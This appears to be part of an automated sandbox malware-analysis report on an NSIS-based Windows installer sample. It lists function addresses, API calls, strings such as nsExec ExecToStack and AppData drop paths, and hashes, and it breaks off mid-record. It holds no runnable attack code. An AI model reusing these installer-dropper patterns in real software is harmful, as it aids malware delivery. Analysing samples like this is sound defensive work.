Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: shovelhead Setup: Completed$aP
API String ID: 3282139019-2099456663
Opcode ID: 5db2143f2917a894034b19fc2abb5fc3ef727a551cec3093833a2ac212f5d40f
Instruction ID: c8c4f9f6fa32ab432123c95edc0b9dc077676c0f3e6a7dc1ab02adf3a8b3c805
Opcode Fuzzy Hash: 5db2143f2917a894034b19fc2abb5fc3ef727a551cec3093833a2ac212f5d40f
Instruction Fuzzy Hash: 54C1D3B1A04205BBDB206F61ED89D2B3A78FB85306F51443EF611B11F1C779A942AB1E

Function 004037E3 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229

lstrcatA.KERNEL32(1033,shovelhead Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,shovelhead Setup: Completed,00000000,00000002,771B3410,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Overheaped237.exe",00000000), ref: 0040385E
lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises,1033,shovelhead Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,shovelhead Setup: Completed,00000000,00000002,771B3410), ref: 004038D3
lstrcmpiA.KERNEL32(?,.exe), ref: 004038E6
GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004038F1
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises), ref: 0040393A

Part of subcall function 00405DC1: wsprintfA.USER32 ref: 00405DCE

RegisterClassA.USER32(00422EC0), ref: 00403977
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040398F
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039C4
ShowWindow.USER32(00000005,00000000), ref: 004039FA
GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403A26
GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403A33
RegisterClassA.USER32(00422EC0), ref: 00403A3C
DialogBoxParamA.USER32(?,00000000,00403B75,00000000), ref: 00403A5B

Strings

Remove folder: , xrefs: 004038A1, 004038A9, 004038B6, 00403900, 00403906
1033, xrefs: 00403803, 00403859
shovelhead Setup: Completed, xrefs: 0040380F, 00403815, 0040383A, 00403843, 00403858
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004037E8
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 0040386D, 00403875, 0040390D, 00403913, 00403923
RichEd32, xrefs: 00403A0E
Control Panel\Desktop\ResourceLocale, xrefs: 00403817
_Nb, xrefs: 00403956, 004039BE
RichEdit20A, xrefs: 00403A1E, 00403A24
.DEFAULT\Control Panel\International, xrefs: 00403849
.exe, xrefs: 004038E0
RichEdit, xrefs: 00403A2D
"C:\Users\user\Desktop\Overheaped237.exe", xrefs: 004037E7
RichEd20, xrefs: 00403A00

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Overheaped237.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$shovelhead Setup: Completed
API String ID: 1975747703-361728532
Opcode ID: f321f38865debe7e05a28eb2188726e223bb839ce9309e8ec04d516c2c1b8f5e
Instruction ID: 6c8974e4dfdcf182ca6d095a6101ff5518a0df20e425d3d5ae506d2571b44078
Opcode Fuzzy Hash: f321f38865debe7e05a28eb2188726e223bb839ce9309e8ec04d516c2c1b8f5e
Instruction Fuzzy Hash: 076191B17442007ED620AF659D45F2B3AACEB8475AF40447FF941B22E2C7BC9D029A7D

Function 00402CB6 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402CCA
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Overheaped237.exe,00000400), ref: 00402CE6

Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Overheaped237.exe,80000000,00000003), ref: 00405ADA
Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Overheaped237.exe,C:\Users\user\Desktop\Overheaped237.exe,80000000,00000003), ref: 00402D2F
GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E76

Strings

Null, xrefs: 00402DAF
C:\Users\user\Desktop\Overheaped237.exe, xrefs: 00402CD0, 00402CDF, 00402CF3, 00402D10
Inst, xrefs: 00402D9D
Error launching installer, xrefs: 00402D06
soft, xrefs: 00402DA6
"C:\Users\user\Desktop\Overheaped237.exe", xrefs: 00402CB6
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402CC0, 00402E8E
C:\Users\user\Desktop, xrefs: 00402D11, 00402D16, 00402D1C
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F0D
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EBF

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Overheaped237.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Overheaped237.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2392138186
Opcode ID: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
Instruction ID: 6560279c47655c84bfe4d90bfb6f1ef804bba6314c77a30d8371cd5976d9e3e8
Opcode Fuzzy Hash: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
Instruction Fuzzy Hash: C66103B1A40215ABDB20AF60DE89B9E77B8EB04354F51413BF501B72D1D7BC9E818B9C

Function 00405E85 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,004050B4,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000), ref: 00405F36
GetSystemDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405FB1
GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405FC4
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406000
SHGetPathFromIDListA.SHELL32(00000000,Remove folder: ), ref: 0040600E
CoTaskMemFree.OLE32(00000000), ref: 00406019
lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040603B
lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,004050B4,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000), ref: 0040608D

Strings

Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\, xrefs: 00405EB4
error, xrefs: 00406065
Remove folder: , xrefs: 00405EAC, 00405F7E, 00405F9B, 00405FB0, 00405FC3, 00405FDF, 0040600A, 0040603A, 00406040, 00406058, 0040606B, 00406086, 0040608C, 00406097, 004060C1
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F80
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406035

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Remove folder: $Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$error
API String ID: 900638850-895406127
Opcode ID: d636f2ff673ad150710af49f9aba5b8caeaeebcde03bf82713dac66827127ef6
Instruction ID: a8b5a8e5c19b1295dd56f0f1fbd515d1e85c9865fba9c5a77ffde0f73355f29a
Opcode Fuzzy Hash: d636f2ff673ad150710af49f9aba5b8caeaeebcde03bf82713dac66827127ef6
Instruction Fuzzy Hash: DE6123B1A40502ABDF219F24CC84BBB3BB4DB45354F15813BE902B62D1D37D4952DB5E

Function 00401751 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

Strings

C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp, xrefs: 0040179B, 0040180A, 00401828
C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\nsExec.dll, xrefs: 0040181E, 0040183A
error, xrefs: 00401805, 00401811, 00401829
ExecToStack, xrefs: 0040176D, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253, xrefs: 0040177E

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp$C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253$ExecToStack$error
API String ID: 1941528284-4234989975
Opcode ID: 1de87f895a20518b32872598fb73e011091ef9609ce5172346e4bbfbe8c97d7e
Instruction ID: 7023b4eef350b7a4ada653e1e4d9b110c77c4e6d7f727d83c91ff2b2eb458513
Opcode Fuzzy Hash: 1de87f895a20518b32872598fb73e011091ef9609ce5172346e4bbfbe8c97d7e
Instruction Fuzzy Hash: 3941C472A00514BACF107BB5CC85EAF3668EF45369B20863BF121B21E1D67C4A41CBAD

Function 0040507C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
lstrcatA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000), ref: 004050D8
SetWindowTextA.USER32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\), ref: 004050EA
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

Strings

Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\, xrefs: 0040509C, 004050AE, 004050B4, 004050D7, 004050E3

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\
API String ID: 2531174081-2469224271
Opcode ID: 871ddc24a54fb64aeccd7c8069c75cad2e612add14608668d5a5d769126a8d66
Instruction ID: 0932fbc12a6b25bcac4b474ac1e4098b180b1803f9783341f4c7184ef00e87b2
Opcode Fuzzy Hash: 871ddc24a54fb64aeccd7c8069c75cad2e612add14608668d5a5d769126a8d66
Instruction Fuzzy Hash: 7E218C71E00508BADF119FA5CD84EDFBFA9EF04358F14807AF944A6291C7789A41CFA8

Function 00405542 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405585
GetLastError.KERNEL32 ref: 00405599
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055AE
GetLastError.KERNEL32 ref: 004055B8

Strings

ds@, xrefs: 00405577
C:\Users\user\Desktop, xrefs: 00405542
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405568
ts@, xrefs: 00405548

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-228423945
Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
Instruction ID: 9e56051543debb7748005a245647f72f9f0c442d478d44b0b7514676580bb89d
Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
Instruction Fuzzy Hash: 2701E571D14259EAEF119BA0CD487EFBBB9EB04354F008176E905B6280D378A604CBAA

Function 0040618E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
wsprintfA.USER32 ref: 004061DE
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2

Strings

UXTHEME, xrefs: 00406197
%s%s.dll, xrefs: 004061D8
\, xrefs: 004061B6

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
Instruction ID: 17d4186d305cf40b40e49104478d07e272734a7bb4b2e73e379b3f466295ecaf
Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
Instruction Fuzzy Hash: D1F0FC3095410567DB159768DC0DFFF365CBB08304F140176A546E51D2D574E9288B69

Function 00401F90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045

Strings

error, xrefs: 0040200F

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: error
API String ID: 2987980305-1574812785
Opcode ID: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
Instruction ID: 215a549463b1ff6cdb2c8ab56b147df35cc58612cba094cab406bca79a610b2d
